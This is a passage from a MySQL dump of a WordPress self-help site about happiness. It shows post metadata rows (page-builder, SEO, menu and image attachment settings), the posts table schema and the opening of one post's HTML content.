(442, 455, '_et_pb_show_page_creation', 'off'),
(443, 455, 'theme-transparent-header-meta', 'default'),
(444, 455, 'site-content-layout', 'default'),
(445, 455, 'site-sidebar-layout', 'default'),
(446, 466, '_yoast_wpseo_content_score', '30'),
(447, 466, '_yoast_wpseo_estimated-reading-time-minutes', '3'),
(448, 466, '_yoast_wpseo_meta-robots-noindex', '1'),
(449, 466, '_yoast_wpseo_meta-robots-nofollow', '1'),
(450, 466, '_et_pb_use_builder', 'on'),
(451, 466, '_et_gb_content_width', ''),
(452, 466, '_edit_last', '1'),
(453, 466, '_et_pb_post_hide_nav', 'default'),
(454, 466, '_et_pb_page_layout', 'et_right_sidebar'),
(455, 466, '_et_pb_side_nav', 'off'),
(456, 466, '_et_pb_built_for_post_type', 'page'),
(457, 466, '_et_pb_ab_subjects', ''),
(458, 466, '_et_pb_enable_shortcode_tracking', ''),
(459, 466, '_et_pb_ab_current_shortcode', '[et_pb_split_track id="466" /]'),
(460, 466, '_et_pb_custom_css', ''),
(461, 466, '_et_pb_gutter_width', '3'),
(462, 466, '_thumbnail_id', '0'),
(463, 466, '_et_pb_first_image', ''),
(464, 466, '_et_pb_truncate_post', ''),
(465, 466, '_et_pb_truncate_post_date', ''),
(466, 466, '_et_builder_version', 'VB|Divi|4.6.0'),
(467, 466, '_et_pb_show_page_creation', 'off'),
(468, 466, '_wp_page_template', 'default'),
(469, 466, 'theme-transparent-header-meta', 'default'),
(470, 466, 'site-content-layout', 'default'),
(471, 466, 'site-sidebar-layout', 'default'),
(472, 466, '_yoast_wpseo_wordproof_timestamp', ''),
(947, 451, '_yoast_wpseo_wordproof_timestamp', ''),
(946, 451, '_edit_lock', '1688546331:1'),
(945, 1667, '_yoast_wpseo_wordproof_timestamp', ''),
(944, 1667, '_yoast_wpseo_estimated-reading-time-minutes', '2'),
(943, 1667, '_yoast_wpseo_content_score', '60'),
(942, 1667, '_edit_last', '1'),
(941, 1667, '_edit_lock', '1691606560:1'),
(940, 1664, '_yoast_wpseo_wordproof_timestamp', ''),
(935, 1661, '_yoast_wpseo_wordproof_timestamp', ''),
(936, 1664, '_edit_lock', '1691606495:1'),
(937, 1664, '_edit_last', '1'),
(938, 1664, '_yoast_wpseo_content_score', '30'),
(939, 1664, '_yoast_wpseo_estimated-reading-time-minutes', '4'),
(527, 510, '_yoast_wpseo_meta-robots-noindex', '1'),
(528, 510, '_yoast_wpseo_estimated-reading-time-minutes', '1'),
(529, 510, '_yoast_wpseo_content_score', '90'),
(530, 510, '_yoast_wpseo_meta-robots-nofollow', '1'),
(531, 510, '_edit_last', '1'),
(532, 510, '_wp_page_template', 'default'),
(533, 510, '_et_pb_use_builder', 'on'),
(534, 510, '_et_pb_show_page_creation', 'off'),
(535, 510, '_et_pb_old_content', '[simpay_payment_receipt]'),
(536, 510, '_et_pb_built_for_post_type', 'page'),
(537, 510, '_et_pb_ab_subjects', ''),
(538, 510, '_et_pb_enable_shortcode_tracking', ''),
(539, 510, '_et_pb_ab_current_shortcode', '[et_pb_split_track id="510" /]'),
(540, 510, '_et_pb_custom_css', ''),
(541, 510, '_et_pb_gutter_width', '3'),
(542, 510, '_thumbnail_id', '0'),
(543, 510, '_et_pb_first_image', ''),
(544, 510, '_et_pb_truncate_post', ''),
(545, 510, '_et_pb_truncate_post_date', ''),
(546, 510, '_et_builder_version', 'VB|Divi|4.6.5'),
(547, 511, '_et_pb_use_builder', 'on'),
(548, 511, '_et_pb_show_page_creation', 'off'),
(549, 511, '_et_pb_old_content', '[simpay_error show_to="admin"]\n\nWe''re sorry, but your transaction failed to process. Please try again or contact site support.'),
(550, 511, '_et_pb_built_for_post_type', 'page'),
(551, 511, '_et_pb_ab_subjects', ''),
(552, 511, '_et_pb_enable_shortcode_tracking', ''),
(553, 511, '_et_pb_ab_current_shortcode', '[et_pb_split_track id="511" /]'),
(554, 511, '_et_pb_custom_css', ''),
(555, 511, '_et_pb_gutter_width', '3'),
(556, 511, '_thumbnail_id', '0'),
(557, 511, '_et_pb_first_image', ''),
(558, 511, '_et_pb_truncate_post', ''),
(559, 511, '_et_pb_truncate_post_date', ''),
(560, 511, '_et_builder_version', 'VB|Divi|4.6.6'),
(561, 511, '_yoast_wpseo_meta-robots-nofollow', '1'),
(562, 511, '_edit_last', '1'),
(563, 511, '_yoast_wpseo_content_score', '90'),
(564, 511, '_yoast_wpseo_estimated-reading-time-minutes', '1'),
(565, 511, '_yoast_wpseo_meta-robots-noindex', '1'),
(592, 1034, '_et_pb_use_builder', 'on'),
(593, 1034, '_et_gb_content_width', ''),
(594, 1034, '_edit_last', '1'),
(595, 1034, '_et_pb_post_hide_nav', 'default'),
(596, 1034, '_et_pb_page_layout', 'et_right_sidebar'),
(597, 1034, '_et_pb_side_nav', 'off'),
(598, 1034, '_et_pb_built_for_post_type', 'page'),
(599, 1034, '_et_pb_ab_subjects', ''),
(600, 1034, '_et_pb_enable_shortcode_tracking', ''),
(601, 1034, '_et_pb_ab_current_shortcode', '[et_pb_split_track id="1034" /]'),
(602, 1034, '_et_pb_custom_css', ''),
(603, 1034, '_et_pb_gutter_width', '3'),
(604, 1034, '_thumbnail_id', '0'),
(605, 1034, '_global_colors_info', '{}'),
(606, 1034, '_et_pb_first_image', ''),
(607, 1034, '_et_pb_truncate_post', ''),
(608, 1034, '_et_pb_truncate_post_date', ''),
(609, 1034, '_et_builder_version', 'VB|Divi|4.9.4'),
(610, 1034, '_et_pb_show_page_creation', 'off'),
(611, 1034, '_wp_page_template', 'default'),
(612, 1034, 'site-sidebar-layout', 'default'),
(613, 1034, 'site-content-layout', 'default'),
(614, 1034, 'theme-transparent-header-meta', 'default'),
(615, 1034, '_yoast_wpseo_content_score', '60'),
(616, 1034, '_yoast_wpseo_estimated-reading-time-minutes', '6'),
(617, 1034, '_yoast_wpseo_wordproof_timestamp', ''),
(893, 1627, '_yoast_wpseo_estimated-reading-time-minutes', '4'),
(892, 1627, '_edit_last', '1'),
(891, 1627, '_edit_lock', '1691337543:1'),
(890, 1620, '_yoast_wpseo_content_score', '30'),
(889, 1620, '_yoast_wpseo_wordproof_timestamp', ''),
(888, 1620, '_yoast_wpseo_estimated-reading-time-minutes', '3'),
(887, 1620, '_edit_last', '1'),
(672, 1500, '_menu_item_type', 'post_type'),
(673, 1500, '_menu_item_menu_item_parent', '0'),
(674, 1500, '_menu_item_object_id', '88'),
(675, 1500, '_menu_item_object', 'page'),
(676, 1500, '_menu_item_target', ''),
(677, 1500, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(678, 1500, '_menu_item_xfn', ''),
(679, 1500, '_menu_item_url', ''),
(1494, 1034, 'astra-migrate-meta-layouts', 'set'),
(1495, 2116, 'footnotes', ''),
(728, 1507, '_menu_item_type', 'post_type'),
(729, 1507, '_menu_item_menu_item_parent', '0'),
(730, 1507, '_menu_item_object_id', '466'),
(731, 1507, '_menu_item_object', 'page'),
(732, 1507, '_menu_item_target', ''),
(733, 1507, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(734, 1507, '_menu_item_xfn', ''),
(735, 1507, '_menu_item_url', ''),
(736, 1508, '_menu_item_type', 'post_type'),
(737, 1508, '_menu_item_menu_item_parent', '0'),
(738, 1508, '_menu_item_object_id', '455'),
(739, 1508, '_menu_item_object', 'page'),
(740, 1508, '_menu_item_target', ''),
(741, 1508, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(742, 1508, '_menu_item_xfn', ''),
(743, 1508, '_menu_item_url', ''),
(744, 1509, '_menu_item_type', 'post_type'),
(745, 1509, '_menu_item_menu_item_parent', '0'),
(746, 1509, '_menu_item_object_id', '451'),
(747, 1509, '_menu_item_object', 'page'),
(748, 1509, '_menu_item_target', ''),
(749, 1509, '_menu_item_classes', 'a:1:{i:0;s:0:"";}'),
(750, 1509, '_menu_item_xfn', ''),
(751, 1509, '_menu_item_url', ''),
(1423, 1680, '_wp_old_date', '2023-06-06'),
(848, 466, '_edit_lock', '1691606720:1'),
(1424, 1678, '_wp_old_date', '2023-06-06'),
(1431, 466, 'footnotes', ''),
(1406, 2059, '_wp_attached_file', 'home_happythinking080723.jpg'),
(843, 1297, '_edit_lock', '1688129949:1'),
(842, 1346, '_edit_lock', '1685464345:1'),
(841, 1034, '_edit_lock', '1704896529:1'),
(1419, 1686, '_wp_old_date', '2023-06-06'),
(1420, 1688, '_wp_old_date', '2023-06-06'),
(1421, 1681, '_wp_old_date', '2023-06-06'),
(1422, 1675, '_wp_old_date', '2023-06-06'),
(934, 1661, '_yoast_wpseo_estimated-reading-time-minutes', '3'),
(933, 1661, '_yoast_wpseo_content_score', '30'),
(914, 1646, '_yoast_wpseo_estimated-reading-time-minutes', '2'),
(895, 1627, '_yoast_wpseo_content_score', '30'),
(894, 1627, '_yoast_wpseo_wordproof_timestamp', ''),
(886, 1620, '_edit_lock', '1691862109:1'),
(885, 1616, '_yoast_wpseo_wordproof_timestamp', ''),
(828, 88, '_edit_lock', '1705257215:1'),
(1169, 1782, '_wp_attached_file', 'yellowunhappy_100623.jpg'),
(1170, 1782, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:600;s:4:"file";s:24:"yellowunhappy_100623.jpg";s:8:"filesize";i:272724;s:5:"sizes";a:2:{s:6:"medium";a:5:{s:4:"file";s:32:"yellowunhappy_100623-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:24682;}s:9:"thumbnail";a:5:{s:4:"file";s:32:"yellowunhappy_100623-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:8242;}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(1253, 1857, '_wp_attached_file', 'tigerouch_170623.jpg'),
(1254, 1857, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:600;s:4:"file";s:20:"tigerouch_170623.jpg";s:8:"filesize";i:338017;s:5:"sizes";a:2:{s:6:"medium";a:5:{s:4:"file";s:28:"tigerouch_170623-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:24978;}s:9:"thumbnail";a:5:{s:4:"file";s:28:"tigerouch_170623-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:7683;}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(1367, 1919, '_yoast_wpseo_meta-robots-noindex', '1'),
(1301, 1866, '_oembed_f66f4b29f66b2377737eb96a92bf3e8c', '{{unknown}}'),
(1497, 2118, 'footnotes', ''),
(1255, 1858, '_wp_attached_file', 'tiger_memory_170623.jpg'),
(1256, 1858, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:600;s:4:"file";s:23:"tiger_memory_170623.jpg";s:8:"filesize";i:336823;s:5:"sizes";a:2:{s:6:"medium";a:5:{s:4:"file";s:31:"tiger_memory_170623-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:25553;}s:9:"thumbnail";a:5:{s:4:"file";s:31:"tiger_memory_170623-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:8027;}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(1397, 2039, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:600;s:4:"file";s:31:"two_unhappy_faces_21_7_2023.jpg";s:8:"filesize";i:217371;s:5:"sizes";a:2:{s:6:"medium";a:5:{s:4:"file";s:39:"two_unhappy_faces_21_7_2023-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:19415;}s:9:"thumbnail";a:5:{s:4:"file";s:39:"two_unhappy_faces_21_7_2023-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:6916;}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(1396, 2039, '_wp_attached_file', 'two_unhappy_faces_21_7_2023.jpg'),
(1331, 1910, '_edit_lock', '1688379164:1'),
(1399, 2040, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:600;s:4:"file";s:31:"one_unhappy_faces_21_7_2023.jpg";s:8:"filesize";i:207363;s:5:"sizes";a:2:{s:6:"medium";a:5:{s:4:"file";s:39:"one_unhappy_faces_21_7_2023-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:19111;}s:9:"thumbnail";a:5:{s:4:"file";s:39:"one_unhappy_faces_21_7_2023-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:6826;}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(1236, 1829, '_wp_attached_file', 'twospheres_160623.jpg'),
(1237, 1829, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:600;s:4:"file";s:21:"twospheres_160623.jpg";s:8:"filesize";i:111249;s:5:"sizes";a:2:{s:6:"medium";a:5:{s:4:"file";s:29:"twospheres_160623-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:12513;}s:9:"thumbnail";a:5:{s:4:"file";s:29:"twospheres_160623-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:5091;}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(1238, 1834, '_wp_attached_file', 'unbalanced_160623.jpg'),
(1239, 1834, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:600;s:4:"file";s:21:"unbalanced_160623.jpg";s:8:"filesize";i:117470;s:5:"sizes";a:2:{s:6:"medium";a:5:{s:4:"file";s:29:"unbalanced_160623-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:13694;}s:9:"thumbnail";a:5:{s:4:"file";s:29:"unbalanced_160623-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:5909;}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(1240, 1835, '_wp_attached_file', 'balanced_160623.jpg'),
(1241, 1835, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:600;s:4:"file";s:19:"balanced_160623.jpg";s:8:"filesize";i:108940;s:5:"sizes";a:2:{s:6:"medium";a:5:{s:4:"file";s:27:"balanced_160623-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:13643;}s:9:"thumbnail";a:5:{s:4:"file";s:27:"balanced_160623-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:5821;}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(1242, 1842, '_wp_attached_file', 'drowning_160623.jpg'),
(1243, 1842, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:600;s:4:"file";s:19:"drowning_160623.jpg";s:8:"filesize";i:215376;s:5:"sizes";a:2:{s:6:"medium";a:5:{s:4:"file";s:27:"drowning_160623-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:19804;}s:9:"thumbnail";a:5:{s:4:"file";s:27:"drowning_160623-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:7331;}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(1393, 2035, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:600;s:4:"file";s:23:"happycauldron210623.jpg";s:8:"filesize";i:125105;s:5:"sizes";a:2:{s:6:"medium";a:5:{s:4:"file";s:31:"happycauldron210623-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:16891;}s:9:"thumbnail";a:5:{s:4:"file";s:31:"happycauldron210623-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:6741;}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(1407, 2059, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:450;s:4:"file";s:28:"home_happythinking080723.jpg";s:8:"filesize";i:70782;s:5:"sizes";a:2:{s:6:"medium";a:5:{s:4:"file";s:36:"home_happythinking080723-300x225.jpg";s:5:"width";i:300;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:9206;}s:9:"thumbnail";a:5:{s:4:"file";s:36:"home_happythinking080723-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:5092;}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(1290, 1877, '_wp_attached_file', 'all_cups_170623b.jpg'),
(1291, 1877, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:600;s:4:"file";s:20:"all_cups_170623b.jpg";s:8:"filesize";i:71863;s:5:"sizes";a:2:{s:6:"medium";a:5:{s:4:"file";s:28:"all_cups_170623b-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:11136;}s:9:"thumbnail";a:5:{s:4:"file";s:28:"all_cups_170623b-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:5180;}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(1272, 1866, '_wp_attached_file', 'cropped-favicon_happythinking170623b.jpg'),
(1273, 1866, '_wp_attachment_context', 'site-icon'),
(1274, 1866, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:512;s:6:"height";i:512;s:4:"file";s:40:"cropped-favicon_happythinking170623b.jpg";s:8:"filesize";i:12882;s:5:"sizes";a:6:{s:6:"medium";a:5:{s:4:"file";s:48:"cropped-favicon_happythinking170623b-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:7197;}s:9:"thumbnail";a:5:{s:4:"file";s:48:"cropped-favicon_happythinking170623b-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:3870;}s:13:"site_icon-270";a:5:{s:4:"file";s:48:"cropped-favicon_happythinking170623b-270x270.jpg";s:5:"width";i:270;s:6:"height";i:270;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:6459;}s:13:"site_icon-192";a:5:{s:4:"file";s:48:"cropped-favicon_happythinking170623b-192x192.jpg";s:5:"width";i:192;s:6:"height";i:192;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:4700;}s:13:"site_icon-180";a:5:{s:4:"file";s:48:"cropped-favicon_happythinking170623b-180x180.jpg";s:5:"width";i:180;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:4442;}s:12:"site_icon-32";a:5:{s:4:"file";s:46:"cropped-favicon_happythinking170623b-32x32.jpg";s:5:"width";i:32;s:6:"height";i:32;s:9:"mime-type";s:10:"image/jpeg";s:8:"filesize";i:1417;}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(1425, 1507, '_wp_old_date', '2023-06-06'),
(1426, 1508, '_wp_old_date', '2023-06-06'),
(1427, 1509, '_wp_old_date', '2023-06-06'),
(1428, 1034, 'footnotes', ''),
(1429, 1632, 'footnotes', ''),
(1430, 1658, 'footnotes', ''),
(1398, 2040, '_wp_attached_file', 'one_unhappy_faces_21_7_2023.jpg'),
(1376, 1994, '_edit_lock', '1688289895:1'),
(1377, 1994, '_edit_last', '1'),
(1378, 1994, '_yoast_wpseo_content_score', '30'),
(1379, 1994, '_yoast_wpseo_estimated-reading-time-minutes', '2'),
(1380, 1994, '_yoast_wpseo_wordproof_timestamp', ''),
(1381, 1994, '_yoast_wpseo_meta-robots-noindex', '1'),
(1408, 1866, '_edit_lock', '1694626428:1'),
(1409, 1500, '_wp_old_date', '2023-06-06'),
(1294, 1883, '_wp_attached_file', 'patternrecognition170623a.gif'),
(1295, 1883, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:600;s:6:"height";i:600;s:4:"file";s:29:"patternrecognition170623a.gif";s:8:"filesize";i:72504;s:5:"sizes";a:2:{s:6:"medium";a:5:{s:4:"file";s:37:"patternrecognition170623a-300x300.gif";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:9:"image/gif";s:8:"filesize";i:25788;}s:9:"thumbnail";a:5:{s:4:"file";s:37:"patternrecognition170623a-150x150.gif";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/gif";s:8:"filesize";i:8362;}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}'),
(1392, 2035, '_wp_attached_file', 'happycauldron210623.jpg'),
(1440, 2090, 'footnotes', ''),
(1435, 88, 'ast-site-content-layout', 'default'),
(1436, 88, 'adv-header-id-meta', ''),
(1437, 88, 'stick-header-meta', ''),
(1438, 88, 'astra-migrate-meta-layouts', 'set'),
(1439, 88, 'footnotes', ''),
(1410, 1496, '_wp_old_date', '2023-06-06'),
(1411, 1683, '_wp_old_date', '2023-06-06'),
(1412, 1685, '_wp_old_date', '2023-06-06'),
(1413, 1677, '_wp_old_date', '2023-06-06'),
(1414, 1676, '_wp_old_date', '2023-06-06'),
(1415, 1684, '_wp_old_date', '2023-06-06'),
(1402, 2054, '_wp_attached_file', 'cauldron_060823.jpg'),
(1536, 2134, 'footnotes', '');

-- --------------------------------------------------------

--
-- Table structure for table `wpou_posts`
--

CREATE TABLE `wpou_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `wpou_posts`
--

INSERT INTO `wpou_posts` VALUES
(1534, 1, '2023-04-10 10:29:31', '2023-04-10 10:29:31', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"id":1251,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image size-full"><img src="https://www.happythinking.com/wp-content/uploads/2021/08/home_stupid300821.gif" alt="" class="wp-image-1251"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy and it is truly free for you to benefit from 